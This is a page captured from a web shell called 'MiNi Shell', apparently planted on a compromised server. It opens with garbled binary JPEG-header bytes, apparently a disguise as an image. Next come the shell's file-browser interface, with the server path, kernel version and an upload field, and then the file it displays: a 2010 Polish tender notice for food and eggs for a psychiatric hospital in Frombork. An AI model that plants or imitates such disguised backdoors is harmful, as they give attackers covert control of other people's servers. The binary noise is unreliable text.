JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101018/291151-N-2010.html

<p class="kh_header"><b>Frombork: Dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 291151 - 2010; data zamieszczenia: 18.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Specjalistyczny Psychiatryczny Zakład Opieki Zdrowotnej , ul. Sanatoryjna 1, 14-530 Frombork, woj. warmińsko-mazurskie, tel. 55 6216302, faks 55 6216300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-frombork.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1	Margaryna miękka zwykła - kostka 250 g. 	kg.	300
2	Olej roślinny - 1 litr	litr.	800
3	Mąka pszenna -1 kg	kg.	1800
4	Kasza jęczmienna - 1 kg	kg.	1000
5	kasza gryczana-1 kg	kg.	500
6	Płatki owsiane - 0,5 kg.	kg.	350
7	Ryż  - 1 kg	kg.	1900
8	Kasza manna - 1 kg	kg.	250
9	Makaron - świderki lub nitki - 0,5 kg	kg.	900
10	Makaron - świderki z mąki Durum - 0,5 kg	kg.	1200
11	Cukier	kg	4750
12	Cukier waniliowy- 32g	szt.	80
13	Chrzan tarty- słoik	kg	100
14	Cynamon	kg	2
15	Dżem- marmolada	kg	550
16	Fasolka szparagowa konserwowa	kg.	220
17	Groch ziarnisty-połówki	kg.	300
18	Groszek konserwowy	kg.	220
19	Herbata	kg.	290
20	Kawa zbożowa	kg.	80
21	Kisiel	kg	200
22	Koncentrat pomidorowy	kg.	300
23	Kwasek cytrynowy	kg.	36
24	Liść laurowy	kg.	2,5
25	Majeranek.	kg	3,5
26	Majonez 0,9 litra	szt.	360
27	Musztarda.	kg	450
28	Ocet 0,5l	litr	10
29	Ogórki konserwowe 0.9 l.	szt.	400
30	Papryka mielona 20g.	szt.	320
31	Pieprz mielony	kg.	20
32	Przyprawa do zupy 1- litrowa	litr	365
33	Przyprawa do zup i sosów (sypka 200g)	szt.	1100
34	Syrop owocowy 0,5 litra	szt.	1000
35	Sól	kg.	1500
36	Mąka ziemniaczana	kg.	100
37	Ziele angielskie	kg.	5
38	Fasola ziarnista	kg.	450
39	Zupa pieczarkowa 50 g.	szt.	200
40	Zupa żurek 50g.	szt.	200
41	Zupa ogonowa 50g	szt.	200
42	Zupa pieczarkowa.	kg.	40
43	Zupa żurek.	kg.	40
44	Zupa ogonowa	kg.	40
45	Szczaw konserwowy	kg.	150
46	Żelatyna spożywcza	kg.	4,8
47	Ketchup	kg.	120
48	Kukurydza konserwowa	kg	150
49	Kakao spożywcze	kg.	90
50	Pietruszka suszona	kg	5
51	Sól czosnkowa	szt.	270
52	Pieprz ziołowy	kg.	4
53	Mak	kg.	5
54	Rodzynki	kg.	3
55	Aromat do ciasta 10ml	szt.	10
56	Grzyby suszone mieszane	kg.	3
57	Śliwki suszone	kg.	5
58	Jabłka suszone	kg.	5
59	Koper suszony	kg	2
60	Papryka pasteryzowana	kg.	200
61	Fasola czerwona konserwowa	kg.	100
62	Woda mineralna gazowana 1,5l	szt.	2500
63	Napoje niegazowane 1,5 litra	szt.	100
64	Ptasie mleczko Wedel lub równoważne	kg.	120
65	Czekolada 200g	szt.	500
66	Cukierki owocowe(nadziewane)	kg.	40
67	Batony ( typu Mars) 60g	szt.	300
68	Wafelki w polewie czekoladowej(typu Grześki)40g lub równoważne	szt.	300
69	Ciastka*	kg.	40
70	Sok owocowy 100%	litr	100
71	Bulion drobiowy	kg	200
72	Kawa rozpuszczalna	kg	5
*ciastka typu: kruche, biszkoptowe, piernik ( w polewie czekoladowej lub lukrowej, z nadzieniem)
UWAGA:  Ceny należy przeliczyć na j.m podane w tabeli.

Pakiet nr 2 
LP.	produktu- przyprawy	j.m	ilość w roku
1	Jajka klasy  L	szt.	27800.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Dostawcy o spełnieniu warunków udziału w postępowaniu w trybie art. 22 ust. 1, pkt 1-4 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Dostawcy o spełnieniu warunków udziału w postępowaniu w trybie art. 22 ust. 1, pkt 1-4 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Dostawcy o spełnieniu warunków udziału w postępowaniu w trybie art. 22 ust. 1, pkt 1-4 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Dostawcy o spełnieniu warunków udziału w postępowaniu w trybie art. 22 ust. 1, pkt 1-4 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Dostawcy o spełnieniu warunków udziału w postępowaniu w trybie art. 22 ust. 1, pkt 1-4 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy - załącznik nr 1 do SIWZ.
2. Pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów
rejestracyjnych) w przypadku podpisywania oferty przez osoby nie wpisane do
dokumentów rejestracyjnych w formie oryginału lub kopii poświadczonej za zgodność z
oryginałem.
3. Oświadczenie Wykonawcy, że zapoznał się z warunkami przetargu zawartymi w
Specyfikacji Istotnych Warunków Zamówienia w tym z kryteriami oceny ofert oraz
załącznikami do SIWZ oraz że przyjmuje je bez zastrzeżeń.
4. Oświadczenie Wykonawcy, że w przypadku wybrania jego oferty zobowiązuje się do
podpisania umowy sprzedaży stanowiącej załącznik nr 5 do SIWZ zgodnie z treścią oferty.
6. Oświadczenie Wykonawcy, że zapewnia właściwe warunki higieniczne transportu przedmiotu zamówienia ( zgodnie z rozporządzeniem WE nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29.04.2004 w sprawie higieny środków spożywczych rozdział IV; VIII.     ( Oświadczenia z pkt 5 i 6   załącznik nr 4 do SIWZ)
7. Wskazanie przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy /
nie powierzy podwykonawcom.
8. Wykaz wszystkich dokumentów - spis zawartości złożonej oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-frombork.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielnego Publicznego Specjalistycznego Psychiatrycznego Zakładu Opieki Zdrowotnej   14-530 Frombork ul. Sanatoryjna 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.11.2010 godzina 13:00, miejsce: Sekretariacie Samodzielnego Publicznego Specjalistycznego Psychiatrycznego Zakładu Opieki Zdrowotnej we Fromborku ul. Sanatoryjna 1 (pok. 18 na parterze)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1
LP.	produktu- przyprawy	j.m	ilość w roku
1	Margaryna miękka zwykła - kostka 250 g. 	kg.	300
2	Olej roślinny - 1 litr	litr.	800
3	Mąka pszenna -1 kg	kg.	1800
4	Kasza jęczmienna - 1 kg	kg.	1000
5	kasza gryczana-1 kg	kg.	500
6	Płatki owsiane - 0,5 kg.	kg.	350
7	Ryż  - 1 kg	kg.	1900
8	Kasza manna - 1 kg	kg.	250
9	Makaron - świderki lub nitki - 0,5 kg	kg.	900
10	Makaron - świderki z mąki Durum - 0,5 kg	kg.	1200
11	Cukier	kg	4750
12	Cukier waniliowy- 32g	szt.	80
13	Chrzan tarty- słoik	kg	100
14	Cynamon	kg	2
15	Dżem- marmolada	kg	550
16	Fasolka szparagowa konserwowa	kg.	220
17	Groch ziarnisty-połówki	kg.	300
18	Groszek konserwowy	kg.	220
19	Herbata	kg.	290
20	Kawa zbożowa	kg.	80
21	Kisiel	kg	200
22	Koncentrat pomidorowy	kg.	300
23	Kwasek cytrynowy	kg.	36
24	Liść laurowy	kg.	2,5
25	Majeranek.	kg	3,5
26	Majonez 0,9 litra	szt.	360
27	Musztarda.	kg	450
28	Ocet 0,5l	litr	10
29	Ogórki konserwowe 0.9 l.	szt.	400
30	Papryka mielona 20g.	szt.	320
31	Pieprz mielony	kg.	20
32	Przyprawa do zupy 1- litrowa	litr	365
33	Przyprawa do zup i sosów (sypka 200g)	szt.	1100
34	Syrop owocowy 0,5 litra	szt.	1000
35	Sól	kg.	1500
36	Mąka ziemniaczana	kg.	100
37	Ziele angielskie	kg.	5
38	Fasola ziarnista	kg.	450
39	Zupa pieczarkowa 50 g.	szt.	200
40	Zupa żurek 50g.	szt.	200
41	Zupa ogonowa 50g	szt.	200
42	Zupa pieczarkowa.	kg.	40
43	Zupa żurek.	kg.	40
44	Zupa ogonowa	kg.	40
45	Szczaw konserwowy	kg.	150
46	Żelatyna spożywcza	kg.	4,8
47	Ketchup	kg.	120
48	Kukurydza konserwowa	kg	150
49	Kakao spożywcze	kg.	90
50	Pietruszka suszona	kg	5
51	Sól czosnkowa	szt.	270
52	Pieprz ziołowy	kg.	4
53	Mak	kg.	5
54	Rodzynki	kg.	3
55	Aromat do ciasta 10ml	szt.	10
56	Grzyby suszone mieszane	kg.	3
57	Śliwki suszone	kg.	5
58	Jabłka suszone	kg.	5
59	Koper suszony	kg	2
60	Papryka pasteryzowana	kg.	200
61	Fasola czerwona konserwowa	kg.	100
62	Woda mineralna gazowana 1,5l	szt.	2500
63	Napoje niegazowane 1,5 litra	szt.	100
64	Ptasie mleczko Wedel lub równoważne	kg.	120
65	Czekolada 200g	szt.	500
66	Cukierki owocowe(nadziewane)	kg.	40
67	Batony ( typu Mars) 60g	szt.	300
68	Wafelki w polewie czekoladowej(typu Grześki)40g lub równoważne	szt.	300
69	Ciastka*	kg.	40
70	Sok owocowy 100%	litr	100
71	Bulion drobiowy	kg	200
72	Kawa rozpuszczalna	kg	5
*ciastka typu: kruche, biszkoptowe, piernik ( w polewie czekoladowej lub lukrowej, z nadzieniem)
UWAGA:  Ceny należy przeliczyć na j.m podane w tabeli..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa jajek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 2 
LP.	produktu- przyprawy	j.m	ilość w roku
1	Jajka klasy  L	szt.	27800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com